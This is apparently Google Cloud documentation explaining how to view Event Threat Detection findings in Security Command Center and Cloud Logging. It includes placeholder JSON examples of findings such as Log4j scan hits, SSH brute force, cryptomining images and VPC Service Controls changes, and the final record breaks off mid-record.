This page shows you how to review Event Threat Detection findings in the Google Cloud console and includes examples of Event Threat Detection findings.
Event Threat Detection is a built-in service that monitors the Cloud Logging logging streams for your organization or projects and detects threats in near-real time. If you activate Security Command Center at the organization level, Event Threat Detection can also monitor your organization's Google Workspace logging streams. To learn more, see Event Threat Detection overview.
Enable or disable Event Threat Detection
By default, Event Threat Detection is enabled. For general information about how to enable or disable a built-in service or its modules, see Configure Security Command Center services.
Reviewing findings
To view Event Threat Detection findings, the service must be enabled in Security Command Center Services settings. After you enable Event Threat Detection, Event Threat Detection generates findings by scanning specific logs. Some of the logs Event Threat Detection can scan are turned off by default, so you might need to turn them on.
For more information about the built-in detection rules that Event Threat Detection uses and the logs that Event Threat Detection scans, see the following topics:
You can view Event Threat Detection findings in Security Command Center. If you configured Continuous Exports to write logs, you can also view findings in Cloud Logging. Continuous Exports to Cloud Logging are only available when you activate Security Command Center at the organization level. To generate a finding and verify your configuration, you can intentionally trigger a detector and test Event Threat Detection.
Event Threat Detection activation occurs within seconds. Detection latencies are generally less than 15 minutes from the time a log is written to when a finding is available in Security Command Center. For more information on latency, see Security Command Center latency overview.
Reviewing findings in Security Command Center
The IAM roles for Security Command Center can be granted at the organization, folder, or project level. Your ability to view, edit, create, or update findings, assets, and security sources depends on the level for which you are granted access. To learn more about Security Command Center roles, see Access control.
Use the following procedure to review findings in the Google Cloud console:
In the Google Cloud console, go to the Security Command Center Findings page.
If necessary, select your Google Cloud project or organization.
In the Quick filters section, in the Source display name subsection, select one or both of the following:
- Event Threat Detection: to filter for findings generated by built-in Event Threat Detection detectors
- Event Threat Detection Custom Modules: to filter for findings generated by custom modules for Event Threat Detection
The table is populated with Event Threat Detection findings.
To view details of a specific finding, click the finding name under
Category. The finding details pane expands to display information including the following:- When the event occurred
- The source of the finding data
- The detection severity, for example High
- The actions taken, like adding an Identity and Access Management (IAM) role to a Gmail user
- The user who took the action, listed next to Principal email
To display all findings that were caused by the same user's actions:
- On the finding details pane, copy the email address next to Principal email.
- Close the pane.
In query editor, enter the following query:
access.principal_email="USER_EMAIL"Replace USER_EMAIL with the email address you previously copied.
Security Command Center displays all findings that are associated with actions taken by the user you specified.
Viewing findings in Cloud Logging
If you configure Continuous Exports to write logs, you can view Event Threat Detection findings in Cloud Logging. This feature is only available if you activate Security Command Center Premium tier at the organization level.
To view Event Threat Detection findings in Cloud Logging, do the following:
Go to Logs Explorer in the Google Cloud console.
Select the Google Cloud project or other Google Cloud resource where you are storing your Event Threat Detection logs.
Use the Query pane to build your query in one of the following ways:
- In the All resources list, do the following:
- Select Threat Detector to display a list of all the detectors.
- To view findings from all detectors, select all detector_name. To view findings from a specific detector, select its name.
- Click Apply. The Query results table is updated with the logs you selected.
Enter the following query in the query editor and click Run query:
resource.type="threat_detector"
The Query results table is updated with the logs you selected.
- In the All resources list, do the following:
To view a log, select a table row, and then click Expand nested fields.
You can create advanced log queries to specify a set of log entries from any number of logs.
Example finding formats
This section provides examples of JSON output for Event Threat Detection findings. You see this output when you export findings using the Google Cloud console or list findings using the Security Command Center API or the Google Cloud CLI.
The examples on this page show different types of findings. Each example includes only the fields that are most relevant to that type of finding. For a complete list of fields that are available in a finding, see the Security Command Center API documentation for the Finding resource.
To see example findings, expand one or more of the following nodes.
Active Scan: Log4j Vulnerable to RCE
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID", "state": "ACTIVE", "category": "Active Scan: Log4j Vulnerable to RCE", "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "log4j_scan_success" }, "detectionPriority": "HIGH", "affectedResources": [{ "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }, { "gcpResourceName": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" }], "evidence": [{ "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1639701222", "nanos": 7.22988344E8 }, "insertId": "INSERT_ID" } }], "properties": { "scannerDomain": "SCANNER_DOMAIN", "sourceIp": "SOURCE_IP_ADDRESS", "vpcName": "default" }, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1210/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-12-17T00:33:42.722988344Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project\u003dPROJECT_ID" }], "relatedFindingUri": { } } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-12-17T00:33:42.722Z", "createTime": "2021-12-17T00:33:44.633Z", "severity": "HIGH", "workflowState": "NEW", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "mute": "UNDEFINED", "findingClass": "THREAT" }, "resource": { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID", "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parentDisplayName": "PROJECT_ID", "type": "google.compute.Instance", "folders": [{ "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_ID", "resourceFolderDisplayName": "FOLDER_DISPLAY_NAME" }], "displayName": "INSTANCE_ID" } }
Brute Force: SSH
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "state": "ACTIVE", "category": "Brute Force: SSH", "sourceProperties": { "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "timestamp": { "nanos": 0.0, "seconds": "65" }, "insertId": "INSERT_ID", "resourceContainer": "projects/PROJECT_ID" } } ], "properties": { "projectId": "PROJECT_ID", "zone": "us-west1-a", "instanceId": "INSTANCE_ID", "attempts": [ { "sourceIp": "SOURCE_IP_ADDRESS", "username": "PROJECT_ID", "vmName": "INSTANCE_ID", "authResult": "SUCCESS" }, { "sourceIp": "SOURCE_IP_ADDRESS", "username": "PROJECT_ID", "vmName": "INSTANCE_ID", "authResult": "FAIL" }, { "sourceIp": "SOURCE_IP_ADDRESS", "username": "PROJECT_ID", "vmName": "INSTANCE_ID", "authResult": "FAIL" } ] }, "detectionPriority": "HIGH", "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1078/003/" } }, "detectionCategory": { "technique": "brute_force", "indicator": "flow_log", "ruleName": "ssh_brute_force" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ] }, "severity": "HIGH", "eventTime": "1970-01-01T00:00:00Z", "createTime": "1970-01-01T00:00:00Z" } }
Cloud IDS
{ "finding": { "access": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/global/findings/FINDING_ID", "category": "Cloud IDS: THREAT_ID", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "connections": [ { "destinationIp": "IP_ADDRESS", "destinationPort": PORT, "sourceIp": "IP_ADDRESS", "sourcePort": PORT, "protocol": "PROTOCOL" } ], "createTime": "TIMESTAMP", "database": {}, "description": "This signature detects a payload in HTTP traffic which could possibly be malicious.", "eventTime": "TIMESTAMP", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": {}, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "LOW", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_DISPLAY_NAME", "type": "google.cloud.resourcemanager.Project", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "ctd-engprod-project", "parent_name": "//cloudresourcemanager.googleapis.com/folders/PARENT_NUMBER", "parent_display_name": "PARENT_DISPLAY_NAME", "folders": [ { "resource_folder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resource_folder_display_name": "FOLDER_DISPLAY_NAME" } ] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "cloud_ids_threat_activity" }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "TIMESTAMP", "nanos": TIMESTAMP }, "insertId": "INSERT_ID" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "LOGGING_QUERY_URI" } ], "relatedFindingUri": {} }, "description": "THREAT_DESCRIPTION" } }
Defense Evasion: Breakglass Workload Deployment Created
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": {}, "serviceName": "k8s.io", "methodName": "io.k8s.core.v1.pods.create" }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Defense Evasion: Breakglass Workload Deployment Created", "cloudDlpInspection": {}, "containers": [ { "name": "test-container", "uri": "test-image" } ], "createTime": "2023-03-24T17:38:45.756Z", "database": {}, "eventTime": "2023-03-24T17:38:45.709Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd, "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "ns": "NAMESPACE", "name": "POD_NAME", "labels": [ { "name": "image-policy.k8s.io/break-glass", "value": "true" } ], "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_URI" } ] } ] }, "mitreAttack": { "primaryTactic": "DEFENSE_EVASION", "primaryTechniques": [ "ABUSE_ELEVATION_CONTROL_MECHANISM" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//container.googleapis.com/projects/PROJECT_NUMBER/locations/us-west1-a/clusters/CLUSTER_NAME/k8s/namespaces/NAMESPACE", "severity": "LOW", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME/k8s/namespaces/NAMESPACE", "display_name": "default", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME", "parent_display_name": "CLUSTER_NAME", "type": "k8s.io.Namespace", "folders": [ { "resourceFolderDisplayName": "FOLDER_NAME", "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER" } ] }, "sourceProperties": { "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1548/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222022-10-07T07:42:06.044146Z%22%0AinsertId%3D%225d80de5c-84b8-4f42-84c7-6b597162e00a%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project=PROJECT_ID" } ], "relatedFindingUri": {} }, "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "binary_authorization_breakglass_workload", "subRuleName": "create" }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME/k8s/namespaces/NAMESPACE" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1679679521", "nanos": 141571000 }, "insertId": "INSERT_ID" } } ] } }
Defense Evasion: Breakglass Workload Deployment Updated
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": {}, "serviceName": "k8s.io", "methodName": "io.k8s.core.v1.pods.update" }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Defense Evasion: Breakglass Workload Deployment Updated", "cloudDlpInspection": {}, "containers": [ { "name": "test-container", "uri": "test-image" } ], "createTime": "2023-03-24T17:38:45.756Z", "database": {}, "eventTime": "2023-03-24T17:38:45.709Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd, "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "ns": "NAMESPACE", "name": "POD_NAME", "labels": [ { "name": "image-policy.k8s.io/break-glass", "value": "true" } ], "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_URI" } ] } ] }, "mitreAttack": { "primaryTactic": "DEFENSE_EVASION", "primaryTechniques": [ "ABUSE_ELEVATION_CONTROL_MECHANISM" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//container.googleapis.com/projects/PROJECT_NUMBER/locations/us-west1-a/clusters/CLUSTER_NAME/k8s/namespaces/NAMESPACE", "severity": "LOW", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME/k8s/namespaces/NAMESPACE", "display_name": "default", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME", "parent_display_name": "CLUSTER_NAME", "type": "k8s.io.Namespace", "folders": [ { "resourceFolderDisplayName": "FOLDER_NAME", "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER" } ] }, "sourceProperties": { "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1548/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222022-10-07T07:42:06.044146Z%22%0AinsertId%3D%225d80de5c-84b8-4f42-84c7-6b597162e00a%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project=PROJECT_ID" } ], "relatedFindingUri": {} }, "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "binary_authorization_breakglass_workload", "subRuleName": "update" }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME/k8s/namespaces/NAMESPACE" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1679679521", "nanos": 141571000 }, "insertId": "INSERT_ID" } } ] } }
Defense Evasion: Modify VPC Service Control
This finding isn't available for project-level activations.
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//accesscontextmanager.googleapis.com/accessPolicies/ACCESS_POLICY_ID/servicePerimeters/SERVICE_PERIMETER", "state": "ACTIVE", "category": "Defense Evasion: Modify VPC Service Control", "sourceProperties": { "sourceId": { "organizationNumber": "ORGANIZATION_ID", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "modify_auth_process", "indicator": "audit_log", "ruleName": "vpcsc_changes", "subRuleName": "reduce_perimeter_protection" }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//accesscontextmanager.googleapis.com/accessPolicies/ACCESS_POLICY_ID/servicePerimeters/SERVICE_PERIMETER" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID" } ], "evidence": [{ "sourceLogId": { "resourceContainer": "organizations/ORGANIZATION_ID", "timestamp": { "seconds": "1633625631", "nanos": 1.78978E8 }, "insertId": "INSERT_ID" } }], "properties": { "name": "accessPolicies/ACCESS_POLICY_ID/servicePerimeters/SERVICE_PERIMETER", "policyLink": "LINK_TO_VPC_SERVICE_CONTROLS", "delta": { "restrictedResources": [{ "resourceName": "PROJECT_NAME", "action": "REMOVE" }], "restrictedServices": [{ "serviceName": "SERVICE_NAME", "action": "REMOVE" }], "allowedServices": [{ "serviceName": "SERVICE_NAME", "action": "ADD" }], "accessLevels": [{ "policyName": "ACCESS_LEVEL_POLICY", "action": "ADD" }] } }, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": ""https://attack.mitre.org/techniques/T1556/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-10-07T16:53:51.178978Z%22%0AinsertId%3D%22-INSERT_ID%22%0Aresource.labels.project_id%3D%22%22?project\u003d" }] } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-10-07T16:53:53.875Z", "createTime": "2021-10-07T16:53:54.411Z", "severity": "MEDIUM", "workflowState": "NEW", "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "mute": "UNDEFINED", "findingClass": "THREAT", "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP", "callerIpGeo": {}, "serviceName": "accesscontextmanager.googleapis.com", "methodName": "google.identity.accesscontextmanager.v1.AccessContextManager.UpdateServicePerimeter" } }, "resource": { "name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "type": "google.cloud.resourcemanager.Organization", "displayName": "RESOURCE_DISPLAY_NAME" } }
Discovery: Can get sensitive Kubernetes object check
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": { "regionCode": "US" }, "serviceName": "k8s.io", "methodName": "io.k8s.authorization.v1.selfsubjectaccessreviews.create" }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/03f466dc25a8496693b7482304fb2e7f", "category": "Discovery: Can get sensitive Kubernetes object check", "contacts": { "technical": { "contacts": [ { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2022-10-08T01:39:42.957Z", "database": {}, "eventTime": "2022-10-08T01:39:40.632Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd", "indicator": {}, "kubernetes": { "accessReviews": [ { "name": "secrets-1665218000", "resource": "secrets", "verb": "get" } ] }, "mitreAttack": {}, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/03f466dc25a8496693b7482304fb2e7f", "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME", "severity": "LOW", "sourceDisplayName": "Event Threat Detection", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME", "display_name": "CLUSTER_NAME", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parent_display_name": "PROJECT_ID", "type": "google.container.Cluster", "folders": [ { "resourceFolderDisplayName": "FOLDER_NAME", "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER" } ] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "gke_control_plane", "subRuleName": "can_get_sensitive_object" }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//k8s.io/authorization.k8s.io/v1/selfsubjectaccessreviews" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1665193180", "nanos": 632000000 }, "insertId": "84af497e-b00e-4cf2-8715-3ae7031880cf" } } ], "properties": {}, "findingId": "03f466dc25a8496693b7482304fb2e7f", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/tactics/TA0007/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222022-10-08T01:39:40.632Z%22%0AinsertId%3D%2284af497e-b00e-4cf2-8715-3ae7031880cf%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project=PROJECT_ID" } ], "relatedFindingUri": {} } } }
Discovery: Service Account Self-Investigation
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "state": "ACTIVE", "category": "Discovery: Service Account Self-Investigation", "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "discovery", "indicator": "audit_log", "ruleName": "iam_anomalous_behavior", "subRuleName": "service_account_gets_own_iam_policy" }, "detectionPriority": "LOW", "affectedResources": [{ "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }], "evidence": [{ "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1619200104", "nanos": 9.08E8 }, "insertId": "INSERT_ID" } }], "properties": { "serviceAccountGetsOwnIamPolicy": { "principalEmail": "USER_EMAIL@PROJECT_ID.iam.gserviceaccount.com", "projectId": "PROJECT_ID", "callerIp": "IP_ADDRESS", "callerUserAgent": "CALLER_USER_AGENT", "rawUserAgent": "RAW_USER_AGENT" } }, "contextUris": { "mitreUri": { "displayName": "Permission Groups Discovery: Cloud Groups", "url": "https://attack.mitre.org/techniques/T1069/003/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "LOGGING_LINK" }] } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-04-23T17:48:24.908Z", "createTime": "2021-04-23T17:48:26.922Z", "severity": "LOW", "workflowState": "NEW", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID" }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parentName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parentDisplayName": "ORGANIZATION_NAME", "type": "google.cloud.resourcemanager.Project" } }
Evasion: Access from Anonymizing Proxy
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "state": "ACTIVE", "category": "Evasion: Access from Anonymizing Proxy", "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "persistence", "indicator": "audit_log", "ruleName": "proxy_access" }, "detectionPriority": "MEDIUM", "affectedResources": [{ "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }], "evidence": [{ "sourceLogId": { "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1633625631", "nanos": 1.78978E8 }, "insertId": "INSERT_ID" } }], "properties": { "changeFromBadIp": { "principalEmail": "PRINCIPAL_EMAIL", "ip": "SOURCE_IP_ADDRESS" } }, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1090/003/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-10-07T16:53:51.178978Z%22%0AinsertId%3D%22-INSERT_ID%22%0Aresource.labels.project_id%3D%22%22?project\u003d" }] } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-10-07T16:53:53.875Z", "createTime": "2021-10-07T16:53:54.411Z", "severity": "MEDIUM", "workflowState": "NEW", "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "mute": "UNDEFINED", "findingClass": "THREAT" }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parentName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parentDisplayName": "PARENT_NAME", "type": "google.cloud.resourcemanager.Project", "displayName": "PROJECT_ID" } }
Execution: Cryptomining Docker Image
{ "finding": { "access": { "callerIpGeo": {}, "serviceName": "run.googleapis.com", "methodName": "/Services.DeleteService" }, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/global/findings/FINDING_ID", "category": "Execution: Cryptomining Docker Image", "chokepoint": {}, "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "contacts": { "security": { "contacts": [ { "email": "EMAIL_ADDRESS" } ] } }, "containers": [ { "imageId": "CONTAINER_IMAGE_ID", "createTime": "1970-01-01T00:00:00Z" } ], "createTime": "2025-05-06T01:06:10.340Z", "database": {}, "dataProtectionKeyGovernance": {}, "eventTime": "2025-05-06T01:06:09.037Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "logEntries": [ { "cloudLoggingEntry": { "insertId": "INSERT_ID", "logId": "cloudaudit.googleapis.com/system_event", "resourceContainer": "projects/PROJECT_ID", "timestamp": "2025-05-06T01:05:31.417999Z" } } ], "mitreAttack": { "primaryTactic": "EXECUTION", "primaryTechniques": [ "DEPLOY_CONTAINER" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "securityPosture": {}, "severity": "HIGH", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "displayName": "PROJECT_ID", "type": "google.cloud.resourcemanager.Project", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "cloudresourcemanager.googleapis.com", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "parentDisplayName": "FOLDER_NAME", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": 